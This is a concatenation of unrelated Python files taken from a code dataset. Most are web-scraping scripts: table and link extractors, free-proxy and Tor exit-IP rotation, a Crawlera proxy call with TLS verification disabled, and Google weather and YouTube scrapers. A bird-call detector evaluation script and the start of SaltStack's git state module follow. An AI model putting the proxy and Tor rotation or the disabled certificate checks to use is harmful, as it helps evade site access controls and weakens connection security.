def save_as_csv(table_name, headers, rows):
    """Write `rows` with column names `headers` to `<table_name>.csv`."""
    frame = pd.DataFrame(rows, columns=headers)
    frame.to_csv(f"{table_name}.csv")
def main(url):
    """Extract every table on the page at `url` and save each as table-N.csv."""
    # get the soup
    soup = get_soup(url)
    # extract all the tables from the web page
    tables = get_all_tables(soup)
    print(f"[+] Found a total of {len(tables)} tables.")
    # iterate over all tables
    for i, table in enumerate(tables, start=1):
        # get the table headers
        headers = get_table_headers(table)
        # get all the rows of the table
        rows = get_table_rows(table)
        # save table as csv file
        table_name = f"table-{i}"
        print(f"[+] Saving {table_name}")
        save_as_csv(table_name, headers, rows)
if __name__ == "__main__":
    # CLI entry point: python html_table_extractor.py URL
    import sys
    try:
        url = sys.argv[1]
    except IndexError:
        print("Please specify a URL.\nUsage: python html_table_extractor.py [URL]")
        # NOTE(review): exit() is the site-module helper; sys.exit(1) is more portable
        exit(1)
    main(url)
import requests
from urllib.parse import urlparse, urljoin
from bs4 import BeautifulSoup
import colorama
# init the colorama module
colorama.init()
# terminal colors for internal/external link reporting
GREEN = colorama.Fore.GREEN
GRAY = colorama.Fore.LIGHTBLACK_EX
RESET = colorama.Fore.RESET
# initialize the set of links (unique links)
internal_urls = set()
external_urls = set()
# global counter used by crawl() to bound the recursion
total_urls_visited = 0
def is_valid(url):
    """Return True when `url` carries both a scheme and a network location."""
    pieces = urlparse(url)
    return bool(pieces.scheme and pieces.netloc)
def get_all_website_links(url):
    """
    Returns all URLs that is found on url in which it belongs to the same website.

    Side effects: adds discovered links to the module-level `internal_urls`
    and `external_urls` sets and prints each new link.
    """
    # all URLs of url
    urls = set()
    # domain name of the URL without the protocol
    domain_name = urlparse(url).netloc
    soup = BeautifulSoup(requests.get(url).content, "html.parser")
    for a_tag in soup.findAll("a"):
        href = a_tag.attrs.get("href")
        if href == "" or href is None:
            # href empty tag
            continue
        # join the URL if it's relative (not absolute link)
        href = urljoin(url, href)
        parsed_href = urlparse(href)
        # remove URL GET parameters, URL fragments, etc.
        href = parsed_href.scheme + "://" + parsed_href.netloc + parsed_href.path
        if not is_valid(href):
            # not a valid URL
            continue
        if href in internal_urls:
            # already in the set
            continue
        # NOTE(review): substring test — a URL merely *containing* the domain
        # anywhere (e.g. in its path) also counts as internal; confirm intended.
        if domain_name not in href:
            # external link
            if href not in external_urls:
                print(f"{GRAY}[!] External link: {href}{RESET}")
                external_urls.add(href)
            continue
        print(f"{GREEN}[*] Internal link: {href}{RESET}")
        urls.add(href)
        internal_urls.add(href)
    return urls
def crawl(url, max_urls=50):
    """
    Crawls a web page and extracts all links, recursively.
    You'll find all links in external_urls and internal_urls global set variables.
    params:
        max_urls (int): number of max urls to crawl, default is 50.
    """
    # NOTE(review): recursion depth grows with the crawl; very large max_urls
    # values could hit Python's recursion limit.
    global total_urls_visited
    total_urls_visited += 1
    links = get_all_website_links(url)
    for link in links:
        if total_urls_visited > max_urls:
            break
        crawl(link, max_urls=max_urls)
if __name__ == "__main__":
    # CLI entry point: crawl a site, print totals, dump link lists to files
    import argparse
    parser = argparse.ArgumentParser(description="Link Extractor Tool with Python")
    parser.add_argument("url", help="The URL to extract links from.")
    parser.add_argument("-m", "--max-urls", help="Number of max URLs to crawl, default is 30.", default=30, type=int)
    args = parser.parse_args()
    url = args.url
    max_urls = args.max_urls
    crawl(url, max_urls=max_urls)
    print("[+] Total Internal links:", len(internal_urls))
    print("[+] Total External links:", len(external_urls))
    print("[+] Total URLs:", len(external_urls) + len(internal_urls))
    domain_name = urlparse(url).netloc
    # save the internal links to a file
    with open(f"{domain_name}_internal_links.txt", "w") as f:
        for internal_link in internal_urls:
            print(internal_link.strip(), file=f)
    # save the external links to a file
    with open(f"{domain_name}_external_links.txt", "w") as f:
        for external_link in external_urls:
            print(external_link.strip(), file=f)
import requests
import random
from bs4 import BeautifulSoup as bs
def get_free_proxies():
    """Scrape free-proxy-list.net and return a list of 'ip:port' strings.

    NOTE(review): depends on the site's table markup (id="proxylisttable");
    if the site changes its layout this returns an empty list or raises.
    """
    url = "https://free-proxy-list.net/"
    # get the HTTP response and construct soup object
    soup = bs(requests.get(url).content, "html.parser")
    proxies = []
    # skip the header row, then read ip (col 0) and port (col 1) per row
    for row in soup.find("table", attrs={"id": "proxylisttable"}).find_all("tr")[1:]:
        tds = row.find_all("td")
        try:
            ip = tds[0].text.strip()
            port = tds[1].text.strip()
            host = f"{ip}:{port}"
            proxies.append(host)
        except IndexError:
            # malformed row (fewer than two cells) — skip it
            continue
    return proxies
def get_session(proxies):
    """Return a requests session routed through one randomly chosen proxy."""
    chosen = random.choice(proxies)
    session = requests.Session()
    # use the same proxy host for both plain and TLS traffic
    session.proxies = {"http": chosen, "https": chosen}
    return session
if __name__ == "__main__":
    # demo: make 5 requests, each through a random proxy, and print the exit IP
    # proxies = get_free_proxies()
    # hard-coded sample list (free proxies rot quickly; refresh as needed)
    proxies = [
        '167.172.248.53:3128',
        '194.226.34.132:5555',
        '203.202.245.62:80',
        '141.0.70.211:8080',
        '118.69.50.155:80',
        '201.55.164.177:3128',
        '51.15.166.107:3128',
        '91.205.218.64:80',
        '128.199.237.57:8080',
    ]
    for i in range(5):
        s = get_session(proxies)
        try:
            print("Request page with IP:", s.get("http://icanhazip.com", timeout=1.5).text.strip())
        except Exception as e:
            # dead proxy — try the next randomly chosen one
            continue
import requests
from stem.control import Controller
from stem import Signal
def get_tor_session():
    """Return a requests session whose traffic is routed through Tor.

    Requires a Tor service installed and listening on localhost:9050.
    """
    tor_proxy = "socks5://localhost:9050"
    session = requests.Session()
    session.proxies = {"http": tor_proxy, "https": tor_proxy}
    return session
def renew_connection():
    """Ask the local Tor control port (9051) for a fresh circuit/exit IP."""
    with Controller.from_port(port=9051) as c:
        # NOTE(review): assumes cookie/no-password auth on the control port — confirm.
        c.authenticate()
        # send NEWNYM signal to establish a new clean connection through the Tor network
        c.signal(Signal.NEWNYM)
if __name__ == "__main__":
    # demo: show the exit IP before and after renewing the Tor circuit
    s = get_tor_session()
    ip = s.get("http://icanhazip.com").text
    print("IP:", ip)
    renew_connection()
    s = get_tor_session()
    ip = s.get("http://icanhazip.com").text
    print("IP:", ip)
import requests
def get_tor_session():
    """Build a requests session proxied through the local Tor SOCKS port (9050)."""
    session = requests.Session()
    # identical SOCKS5 proxy for both schemes; requires a running Tor service
    session.proxies = dict.fromkeys(("http", "https"), "socks5://localhost:9050")
    return session
if __name__ == "__main__":
    # demo: print the Tor exit IP
    s = get_tor_session()
    ip = s.get("http://icanhazip.com").text
    print("IP:", ip)
import requests
url = "http://icanhazip.com"
proxy_host = "proxy.crawlera.com"
proxy_port = "8010"
# "<APIKEY>:" — empty credentials placeholder; put your Crawlera API key before the colon
proxy_auth = ":"
# NOTE(review): the proxy URL appears to be missing the '@' between the
# credentials and the host — verify against the original source.
proxies = {
   "https": f"https://{proxy_auth}{proxy_host}:{proxy_port}/",
   "http": f"http://{proxy_auth}{proxy_host}:{proxy_port}/"
}
# NOTE(review): verify=False disables TLS certificate verification (often
# required by intercepting proxies, but insecure) — confirm intentional.
r = requests.get(url, proxies=proxies, verify=False)
from bs4 import BeautifulSoup as bs
import requests
# desktop-browser User-Agent so Google serves the full weather widget
USER_AGENT = "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
# US english
# NOTE(review): looks like a mangled "en-US,en;q=0.5" — verify against original.
LANGUAGE = "en-US,enq=0.5"
def get_weather_data(url):
    """Scrape Google's weather widget for the given search URL.

    Returns a dict with region, current conditions and a 'next_days' list.
    NOTE(review): every selector below (wob_loc, wob_tm, ...) depends on
    Google's result-page markup and breaks whenever Google changes it.
    """
    session = requests.Session()
    # spoof a regular browser and ask for English content
    session.headers['User-Agent'] = USER_AGENT
    session.headers['Accept-Language'] = LANGUAGE
    session.headers['Content-Language'] = LANGUAGE
    html = session.get(url)
    # create a new soup
    soup = bs(html.text, "html.parser")
    # store all results on this dictionary
    result = {}
    # extract region
    result['region'] = soup.find("div", attrs={"id": "wob_loc"}).text
    # extract temperature now
    result['temp_now'] = soup.find("span", attrs={"id": "wob_tm"}).text
    # get the day and hour now
    result['dayhour'] = soup.find("div", attrs={"id": "wob_dts"}).text
    # get the actual weather
    result['weather_now'] = soup.find("span", attrs={"id": "wob_dc"}).text
    # get the precipitation
    result['precipitation'] = soup.find("span", attrs={"id": "wob_pp"}).text
    # get the % of humidity
    result['humidity'] = soup.find("span", attrs={"id": "wob_hm"}).text
    # extract the wind
    result['wind'] = soup.find("span", attrs={"id": "wob_ws"}).text
    # get next few days' weather
    next_days = []
    days = soup.find("div", attrs={"id": "wob_dp"})
    for day in days.findAll("div", attrs={"class": "wob_df"}):
        # extract the name of the day
        day_name = day.find("div", attrs={"class": "vk_lgy"}).attrs['aria-label']
        # get weather status for that day
        weather = day.find("img").attrs["alt"]
        temp = day.findAll("span", {"class": "wob_t"})
        # maximum temperature in Celsius, use temp[1].text if you want fahrenheit
        max_temp = temp[0].text
        # minimum temperature in Celsius, use temp[3].text if you want fahrenheit
        min_temp = temp[2].text
        next_days.append({"name": day_name, "weather": weather, "max_temp": max_temp, "min_temp": min_temp})
    # append to result
    result['next_days'] = next_days
    return result
if __name__ == "__main__":
    # base Google search URL; a region name is appended to the query below
    URL = "https://www.google.com/search?lr=lang_en&ie=UTF-8&q=weather"
    import argparse
    parser = argparse.ArgumentParser(description="Quick Script for Extracting Weather data using Google Weather")
    parser.add_argument("region", nargs="?", help="""Region to get weather for, must be available region.
                                        Default is your current location determined by your IP Address""", default="")
    # parse arguments
    args = parser.parse_args()
    region = args.region
    # appending directly extends the q= query parameter
    URL += region
    # get data
    data = get_weather_data(URL)
    # print data
    print("Weather for:", data["region"])
    print("Now:", data["dayhour"])
    print(f"Temperature now: {data['temp_now']}C")
    print("Description:", data['weather_now'])
    print("Precipitation:", data["precipitation"])
    print("Humidity:", data["humidity"])
    print("Wind:", data["wind"])
    print("Next days:")
    for dayweather in data["next_days"]:
        print("="*40, dayweather["name"], "="*40)
        print("Description:", dayweather["weather"])
        print(f"Max temperature: {dayweather['max_temp']}C")
        print(f"Min temperature: {dayweather['min_temp']}C")
import requests
from bs4 import BeautifulSoup as bs
from urllib.parse import urljoin
import sys
# Flat script: list all JavaScript and CSS files referenced by a page.
# URL of the web page you want to extract
url = sys.argv[1]
# initialize a session
session = requests.Session()
# set the User-agent as a regular browser
session.headers["User-Agent"] = "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
# get the HTML content
html = session.get(url).content
# parse HTML using beautiful soup
soup = bs(html, "html.parser")
# get the JavaScript files
script_files = []
for script in soup.find_all("script"):
    if script.attrs.get("src"):
        # if the tag has the attribute 'src'
        script_url = urljoin(url, script.attrs.get("src"))
        script_files.append(script_url)
# get the CSS files
# NOTE(review): this collects *all* <link href> targets (icons, preloads, ...),
# not only rel="stylesheet" — confirm that is intended.
css_files = []
for css in soup.find_all("link"):
    if css.attrs.get("href"):
        # if the link tag has the 'href' attribute
        css_url = urljoin(url, css.attrs.get("href"))
        css_files.append(css_url)
print("Total script files in the page:", len(script_files))
print("Total CSS files in the page:", len(css_files))
# write file links into files
with open("javascript_files.txt", "w") as f:
    for js_file in script_files:
        print(js_file, file=f)
with open("css_files.txt", "w") as f:
    for css_file in css_files:
        print(css_file, file=f)
import wikipedia
# Flat demo script for the `wikipedia` package (network required).
# print the summary of what python is
print(wikipedia.summary("Python Programming Language"))
# search for a term
result = wikipedia.search("Neural networks")
print("Result search of 'Neural networks':", result)
# get the page: Neural network (first search hit)
page = wikipedia.page(result[0])
# get the title of the page
title = page.title
# get the categories of the page
categories = page.categories
# get the whole wikipedia page text (content)
content = page.content
# get all the links in the page
links = page.links
# get the page references
references = page.references
# summary
summary = page.summary
# print info
print("Page content:\n", content, "\n")
print("Page title:", title, "\n")
print("Categories:", categories, "\n")
print("Links:", links, "\n")
print("References:", references, "\n")
print("Summary:", summary, "\n")
import requests
from bs4 import BeautifulSoup as bs
def get_video_info(url):
    """Scrape title/views/likes/channel info from a YouTube watch page.

    NOTE(review): these class/id selectors belong to YouTube's legacy
    server-rendered markup and no longer exist on current pages — verify.
    """
    # download HTML code
    content = requests.get(url)
    # create beautiful soup object to parse HTML
    soup = bs(content.content, "html.parser")
    # initialize the result
    result = {}
    # video title
    result['title'] = soup.find("span", attrs={"class": "watch-title"}).text.strip()
    # video views (converted to integer); strips the trailing " views" text
    result['views'] = int(soup.find("div", attrs={"class": "watch-view-count"}).text[:-6].replace(",", ""))
    # video description
    result['description'] = soup.find("p", attrs={"id": "eow-description"}).text
    # date published
    result['date_published'] = soup.find("strong", attrs={"class": "watch-time-text"}).text
    # number of likes as integer
    result['likes'] = int(soup.find("button", attrs={"title": "I like this"}).text.replace(",", ""))
    # number of dislikes as integer
    result['dislikes'] = int(soup.find("button", attrs={"title": "I dislike this"}).text.replace(",", ""))
    # channel details
    channel_tag = soup.find("div", attrs={"class": "yt-user-info"}).find("a")
    # channel name
    channel_name = channel_tag.text
    # channel URL
    channel_url = f"https://www.youtube.com{channel_tag['href']}"
    # number of subscribers as str
    channel_subscribers = soup.find("span", attrs={"class": "yt-subscriber-count"}).text.strip()
    result['channel'] = {'name': channel_name, 'url': channel_url, 'subscribers': channel_subscribers}
    return result
if __name__ == "__main__":
    # CLI entry point: python script.py VIDEO_URL
    import argparse
    parser = argparse.ArgumentParser(description="YouTube Video Data Extractor")
    parser.add_argument("url", help="URL of the YouTube video")
    args = parser.parse_args()
    # parse the video URL from command line
    url = args.url
    data = get_video_info(url)
    # print in nice format
    print(f"Title: {data['title']}")
    print(f"Views: {data['views']}")
    print(f"\nDescription: {data['description']}\n")
    print(data['date_published'])
    print(f"Likes: {data['likes']}")
    print(f"Dislikes: {data['dislikes']}")
    print(f"\nChannel Name: {data['channel']['name']}")
    print(f"Channel URL: {data['channel']['url']}")
    print(f"Channel Subscribers: {data['channel']['subscribers']}")
| 33.686085
| 878
| 0.610527
|
4a022abc64e60bf6d1fb357a409978404426bade
| 10,921
|
py
|
Python
|
scripts/detector_eval/auto/evaluate_detectors.py
|
RichardLitt/Vesper
|
5360844f42a06942e7684121c650b08cf8616285
|
[
"MIT"
] | 29
|
2017-07-10T14:49:15.000Z
|
2022-02-02T23:14:38.000Z
|
scripts/detector_eval/auto/evaluate_detectors.py
|
Tubbz-alt/Vesper
|
76e5931ca0c7fbe070c53b1362ec246ec9007beb
|
[
"MIT"
] | 167
|
2015-03-17T14:45:22.000Z
|
2022-03-30T21:00:05.000Z
|
scripts/detector_eval/auto/evaluate_detectors.py
|
Tubbz-alt/Vesper
|
76e5931ca0c7fbe070c53b1362ec246ec9007beb
|
[
"MIT"
] | 4
|
2015-02-06T03:30:27.000Z
|
2020-12-27T08:38:52.000Z
|
"""
Plots precision-recall curves for detectors run on the BirdVox-full-night
recordings.
The inputs required by this script are:
1. CSV files produced by the run_detectors script. The directory containing
the files is specified by
scripts.pnf_energy_detector_eval.utils.WORKING_DIR_PATH. All CSV files in
the directory are processed.
2. The BirdVox-full-night CSV annotation files, as distributed with the
BirdVox-full-night dataset. The directory containing these files is
specified by scripts.pnf_energy_detector_eval.utils.ANNOTATIONS_DIR_PATH.
The outputs produced by this script are:
1. A PDF file for each input CSV file, containing plots of detector
precision-recall curves. The directory to which these files are written
is specified by scripts.pnf_energy_detector_eval.utils.WORKING_DIR_PATH.
"""
from collections import defaultdict
import csv
from matplotlib.backends.backend_pdf import PdfPages
from matplotlib.ticker import MultipleLocator
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import scripts.detector_eval.auto.utils as utils
def window(offset, duration):
    """Convert an (offset, duration) pair from seconds to sample counts."""
    to_samples = utils.seconds_to_samples
    return (to_samples(offset), to_samples(duration))
# Per-detector (offset, duration) windows, given in seconds and converted to
# sample counts by window().
DETECTOR_CALL_CENTER_WINDOWS = {
    'MPG Ranch Thrush Detector 0.0': window(.150, .350),
    'MPG Ranch Tseep Detector 0.0': window(.100, .200),
    'Old Bird Thrush Detector Redux 1.1': window(.050, .200),
    'Old Bird Tseep Detector Redux 1.1': window(.050, .200)
}
"""
Mapping from detector names to clip call center windows. For a
detected clip to be considered a call, its window must contain a
BirdVox-full-night call center.
"""
DETECTOR_REFERENCE_THRESHOLDS = {
    'MPG Ranch Thrush Detector 0.0': .9,
    'MPG Ranch Tseep Detector 0.0': .9,
    'Old Bird Thrush Detector Redux 1.1': 1.3,
    'Old Bird Tseep Detector Redux 1.1': 2
}
"""
Mapping from detector names to detector reference thresholds.
The plots produced by this script include dots at the reference thresholds.
"""
def main():
    """Evaluate every detections CSV in the working directory, then announce."""
    clip_file_paths = sorted(utils.WORKING_DIR_PATH.glob('*.csv'))
    for path in clip_file_paths:
        process_file(path)
    utils.announce('Harold, your evaluation script has finished.')
def process_file(file_path):
    """Score one detections CSV against the ground truth and plot P/R curves."""
    detected_clips = get_detected_clips(file_path)
    show_detected_clip_counts(detected_clips)
    ground_truth_call_centers = get_ground_truth_call_centers()
    show_ground_truth_call_counts(ground_truth_call_centers)
    counts = count_detected_calls(detected_clips, ground_truth_call_centers)
    unaggregated_df = create_unaggregated_df(counts)
    # aggregate over recording units, then add metrics to both tables
    aggregated_df = create_aggregated_df(unaggregated_df)
    add_precision_recall_f1(unaggregated_df)
    add_precision_recall_f1(aggregated_df)
    print('unaggregated_df', unaggregated_df.to_csv())
    print('aggregated_df', aggregated_df.to_csv())
    # plot file is named after the input CSV, minus its extension
    file_name_base = file_path.name[:-len('.csv')]
    plot_precision_recall_curves(
        file_name_base, unaggregated_df, aggregated_df)
def get_detected_clips(file_path):
    """Read a detections CSV into a dict mapping
    (detector name, unit number, threshold) -> list of (start index, length).
    """
    clips = defaultdict(list)
    with open(file_path) as csv_file:
        reader = csv.reader(csv_file)
        # discard the header row
        next(reader)
        for row in reader:
            detector, unit, threshold, start, length = row[:5]
            key = (detector, int(unit), float(threshold))
            clips[key].append((int(start), int(length)))
    return clips
def show_detected_clip_counts(clips):
    """Print the clip count for each (detector, unit, threshold) key, sorted."""
    print('Detected clip counts:')
    for key in sorted(clips):
        print('   ', key, len(clips[key]))
def get_ground_truth_call_centers():
    """Read the BirdVox annotation CSVs into a dict mapping
    (call type, unit number) -> sorted list of call center sample indices.
    """
    centers = defaultdict(list)
    for unit_num in utils.UNIT_NUMS:
        file_path = utils.get_annotations_file_path(unit_num)
        with open(file_path) as file_:
            reader = csv.reader(file_)
            # Skip header.
            next(reader)
            for row in reader:
                # column 0: call center time in seconds; column 1: frequency in Hz
                time = float(row[0])
                index = utils.seconds_to_samples(time)
                freq = int(row[1])
                call_type = get_call_type(freq)
                key = (call_type, unit_num)
                centers[key].append(index)
    # Make sure center index lists are sorted.
    for indices in centers.values():
        indices.sort()
    return centers
def get_call_type(freq):
    """Classify a call by frequency: tseep at/above the threshold, thrush below."""
    if freq >= utils.FREQ_THRESHOLD:
        return 'Tseep'
    return 'Thrush'
def show_ground_truth_call_counts(call_centers):
    """Print the ground truth call count for each (call type, unit) key, sorted."""
    print('Ground truth call counts:')
    for key in sorted(call_centers):
        print('   ', key, len(call_centers[key]))
def count_detected_calls(detected_clips, ground_truth_call_center_indices):
    """Build result rows [detector, unit, threshold, ground truth calls,
    detected calls, detected clips] by matching clips against call centers.
    """
    rows = []
    for (detector_name, unit_num, threshold), clips in detected_clips.items():
        detector_type = get_detector_type(detector_name)
        call_center_indices = \
            ground_truth_call_center_indices[(detector_type, unit_num)]
        window = get_detector_call_center_window(detector_name)
        if window is None:
            # unknown detector: skip rather than fail the whole evaluation
            print((
                'Could not find call center window for detector "{}". '
                'Detector will not be evaluated.').format(detector_name))
            continue
        matches = match_clips_with_calls(clips, call_center_indices, window)
        detected_call_count = len(matches)
        detected_clip_count = len(clips)
        ground_truth_call_count = len(call_center_indices)
        rows.append([
            detector_name, unit_num, threshold, ground_truth_call_count,
            detected_call_count, detected_clip_count])
    return rows
def get_detector_type(detector_name):
    """Return 'Thrush' when the name mentions Thrush, otherwise 'Tseep'."""
    return 'Thrush' if 'Thrush' in detector_name else 'Tseep'
def get_detector_call_center_window(detector_name):
    """Return the call center window for `detector_name`, or None if unknown.

    BUG FIX: the caller (count_detected_calls) checks for a None return to
    skip unknown detectors, but dict indexing raised KeyError instead, so
    that skip path was unreachable. Use .get() so it actually works.
    """
    return DETECTOR_CALL_CENTER_WINDOWS.get(detector_name)
def match_clips_with_calls(clips, call_center_indices, window):
    """Match detected clips to ground truth call centers with a linear merge.

    Returns a list of (clip index, call index) pairs where the clip's call
    center window contains the call center. Each clip and each call is used
    at most once.

    NOTE(review): the two-pointer sweep assumes both `clips` and
    `call_center_indices` are sorted ascending — call centers are sorted by
    the caller; clip order comes straight from the CSV. Confirm.
    """
    clip_windows = [get_clip_window(clip, window) for clip in clips]
    clip_count = len(clips)
    call_count = len(call_center_indices)
    i = 0
    j = 0
    matches = []
    while i != clip_count and j != call_count:
        window_start_index, window_end_index = clip_windows[i]
        call_center_index = call_center_indices[j]
        if window_end_index <= call_center_index:
            # clip window i precedes call center j
            i += 1
        elif window_start_index > call_center_index:
            # clip window i follows call center j
            j += 1
        else:
            # clip window i includes call center j
            matches.append((i, j))
            i += 1
            j += 1
    return matches
def get_clip_window(clip, window):
    """Return the (start, end) sample indices of `window` placed inside `clip`.

    `clip` is (start index, length); `window` is (offset from clip start,
    length). Both edges are clamped so the window never passes the clip end.
    """
    clip_start, clip_length = clip
    clip_end = clip_start + clip_length
    offset, window_length = window
    start = min(clip_start + offset, clip_end)
    end = min(start + window_length, clip_end)
    return (start, end)
def create_unaggregated_df(rows):
    """Build the per-(detector, unit, threshold) counts DataFrame."""
    return pd.DataFrame(
        rows,
        columns=[
            'Detector', 'Unit', 'Threshold', 'Ground Truth Calls',
            'Detected Calls', 'Detected Clips'])
def create_aggregated_df(df):
    """Sum counts over recording units, grouping by (detector, threshold).

    Uses the string aggregation name 'sum' rather than the ``np.sum``
    callable: passing NumPy reduction functions to ``aggregate`` is
    deprecated in recent pandas and resolves to the same built-in sum.
    """
    df = df.drop(columns=['Unit'])
    grouped = df.groupby(['Detector', 'Threshold'], as_index=False)
    return grouped.aggregate('sum')
def add_precision_recall_f1(df):
    """Add Precision, Recall and F1 columns (as percents) to `df` in place."""
    precision = df['Detected Calls'] / df['Detected Clips']
    recall = df['Detected Calls'] / df['Ground Truth Calls']
    f1 = 2 * precision * recall / (precision + recall)
    df['Precision'] = to_percent(precision)
    df['Recall'] = to_percent(recall)
    df['F1'] = to_percent(f1)
def to_percent(x):
    """Convert a fraction to a percentage rounded to one decimal place."""
    return round(x * 1000) / 10
def plot_precision_recall_curves(
        file_name_base, unaggregated_df, aggregated_df):
    """Write a multi-page PDF: one P/R plot for all units, then one per unit."""
    file_path = utils.get_plot_file_path(file_name_base)
    with PdfPages(file_path) as pdf:
        detector_names = unaggregated_df['Detector'].unique()
        plot_precision_recall_curves_aux(
            'All Units', aggregated_df, detector_names, pdf)
        for unit_num in utils.UNIT_NUMS:
            unit_name = 'Unit {}'.format(unit_num)
            unit_df = unaggregated_df.loc[unaggregated_df['Unit'] == unit_num]
            # skip units with no rows (no detections for that unit)
            if unit_df.shape[0] != 0:
                plot_precision_recall_curves_aux(
                    unit_name, unit_df, detector_names, pdf)
def plot_precision_recall_curves_aux(
        title_suffix, full_df, detector_names, pdf):
    """Plot one P/R figure (one curve per detector) onto the given PDF page."""
    plt.figure(figsize=(6, 6))
    axes = plt.gca()
    # Plot separate detector curves.
    for i, detector_name in enumerate(detector_names):
        df = full_df.loc[full_df['Detector'] == detector_name]
        plot_precision_recall_curve(df, detector_name, i, axes)
    # Set title and axis labels.
    plt.title('Precision vs. Recall, ' + title_suffix)
    plt.xlabel('Recall (%)')
    plt.ylabel('Precision (%)')
    # Set axis limits.
    plt.xlim((0, 100))
    plt.ylim((0, 100))
    # Configure grid: major lines every 25 %, minor every 5 %.
    major_locator = MultipleLocator(25)
    minor_locator = MultipleLocator(5)
    axes.xaxis.set_major_locator(major_locator)
    axes.xaxis.set_minor_locator(minor_locator)
    axes.yaxis.set_major_locator(major_locator)
    axes.yaxis.set_minor_locator(minor_locator)
    plt.grid(which='both')
    plt.grid(which='minor', alpha=.4)
    # Show legend.
    axes.legend()
    # save this figure as a new PDF page, then release it
    pdf.savefig()
    plt.close()
def plot_precision_recall_curve(df, detector_name, i, axes):
    """Plot one detector's P/R curve; `i` selects the matplotlib color cycle slot."""
    color = 'C{}'.format(i)
    precisions = df['Precision'].values
    recalls = df['Recall'].values
    label = detector_name
    axes.plot(recalls, precisions, color=color, label=label)
    # Put marker at threshold nearest detector reference threshold.
    reference_threshold = get_detector_reference_threshold(detector_name)
    if reference_threshold is not None:
        # linear scan for the row whose threshold is closest to the reference
        k = None
        min_diff = 1e6
        for j, t in enumerate(df['Threshold'].values):
            diff = abs(t - reference_threshold)
            if diff < min_diff:
                k = j
                min_diff = diff
        # NOTE(review): if df is empty, k stays None and indexing below raises —
        # callers appear to filter empty frames upstream; confirm.
        axes.plot([recalls[k]], [precisions[k]], marker='o', color=color)
def get_detector_reference_threshold(detector_name):
    """Return the reference threshold for ``detector_name``, or None when
    the detector has no entry in ``DETECTOR_REFERENCE_THRESHOLDS``.

    The caller (plot_precision_recall_curve) explicitly handles a None
    return, so a detector without a configured reference threshold must
    not raise KeyError — use dict.get rather than direct indexing.
    """
    return DETECTOR_REFERENCE_THRESHOLDS.get(detector_name)
# Run the report generation only when executed directly as a script.
if __name__ == '__main__':
    main()
| 29.200535
| 78
| 0.64289
|
4a022c195e2a6c77cf636087eecd5ce3da91e1e5
| 114,741
|
py
|
Python
|
salt/states/git.py
|
feth/salt
|
f4e610bb987d9529faca1f0ad1c339d3c4b3642b
|
[
"Apache-2.0"
] | null | null | null |
salt/states/git.py
|
feth/salt
|
f4e610bb987d9529faca1f0ad1c339d3c4b3642b
|
[
"Apache-2.0"
] | 1
|
2019-09-06T13:57:28.000Z
|
2019-09-06T13:57:28.000Z
|
salt/states/git.py
|
feth/salt
|
f4e610bb987d9529faca1f0ad1c339d3c4b3642b
|
[
"Apache-2.0"
] | 1
|
2020-09-30T16:09:48.000Z
|
2020-09-30T16:09:48.000Z
|
# -*- coding: utf-8 -*-
'''
States to manage git repositories and git configuration
.. important::
Before using git over ssh, make sure your remote host fingerprint exists in
your ``~/.ssh/known_hosts`` file.
.. versionchanged:: 2015.8.8
This state module now requires git 1.6.5 (released 10 October 2009) or
newer.
'''
from __future__ import absolute_import
# Import python libs
import copy
import logging
import os
import re
import string
from distutils.version import LooseVersion as _LooseVersion
# Import salt libs
import salt.utils
import salt.utils.url
from salt.exceptions import CommandExecutionError
from salt.ext import six
# Module-level logger, named after this module's import path.
log = logging.getLogger(__name__)
def __virtual__():
    '''
    Only load if git is available
    '''
    # Bail out early when the git execution module itself did not load.
    if 'git.version' not in __salt__:
        return False
    # This state module requires git 1.6.5 or newer (see module docstring).
    minimum = _LooseVersion('1.6.5')
    detected = _LooseVersion(__salt__['git.version'](versioninfo=False))
    return detected >= minimum
def _revs_equal(rev1, rev2, rev_type):
'''
Shorthand helper function for comparing SHA1s. If rev_type == 'sha1' then
the comparison will be done using str.startwith() to allow short SHA1s to
compare successfully.
NOTE: This means that rev2 must be the short rev.
'''
if (rev1 is None and rev2 is not None) \
or (rev2 is None and rev1 is not None):
return False
elif rev1 is rev2 is None:
return True
elif rev_type == 'sha1':
return rev1.startswith(rev2)
else:
return rev1 == rev2
def _short_sha(sha1):
return sha1[:7] if sha1 is not None else None
def _format_comments(comments):
'''
Return a joined list
'''
ret = '. '.join(comments)
if len(comments) > 1:
ret += '.'
return ret
def _need_branch_change(branch, local_branch):
'''
Short hand for telling when a new branch is needed
'''
return branch is not None and branch != local_branch
def _get_branch_opts(branch, local_branch, all_local_branches,
desired_upstream, git_ver=None):
'''
DRY helper to build list of opts for git.branch, for the purposes of
setting upstream tracking branch
'''
if branch is not None and branch not in all_local_branches:
# We won't be setting upstream because the act of checking out a new
# branch will set upstream for us
return None
if git_ver is None:
git_ver = _LooseVersion(__salt__['git.version'](versioninfo=False))
ret = []
if git_ver >= _LooseVersion('1.8.0'):
ret.extend(['--set-upstream-to', desired_upstream])
else:
ret.append('--set-upstream')
# --set-upstream does not assume the current branch, so we have to
# tell it which branch we'll be using
ret.append(local_branch if branch is None else branch)
ret.append(desired_upstream)
return ret
def _get_local_rev_and_branch(target, user, password):
    '''
    Look up the current revision and branch of the local checkout at
    ``target``, returning a (rev, branch) tuple. Either element is None
    when the corresponding lookup fails (e.g. an empty repository).
    '''
    log.info('Checking local revision for {0}'.format(target))
    try:
        local_rev = __salt__['git.revision'](
            target,
            user=user,
            password=password,
            ignore_retcode=True)
    except CommandExecutionError:
        log.info('No local revision for {0}'.format(target))
        local_rev = None

    log.info('Checking local branch for {0}'.format(target))
    try:
        local_branch = __salt__['git.current_branch'](
            target,
            user=user,
            password=password,
            ignore_retcode=True)
    except CommandExecutionError:
        log.info('No local branch for {0}'.format(target))
        local_branch = None

    return local_rev, local_branch
def _strip_exc(exc):
'''
Strip the actual command that was run from exc.strerror to leave just the
error message
'''
return re.sub(r'^Command [\'"].+[\'"] failed: ', '', exc.strerror)
def _uptodate(ret, target, comments=None, local_changes=False):
ret['comment'] = 'Repository {0} is up-to-date'.format(target)
if local_changes:
ret['comment'] += ', but with local changes. Set \'force_reset\' to ' \
'True to purge local changes.'
if comments:
# Shouldn't be making any changes if the repo was up to date, but
# report on them so we are alerted to potential problems with our
# logic.
ret['comment'] += '\n\nChanges made: ' + comments
return ret
def _neutral_test(ret, comment):
ret['result'] = None
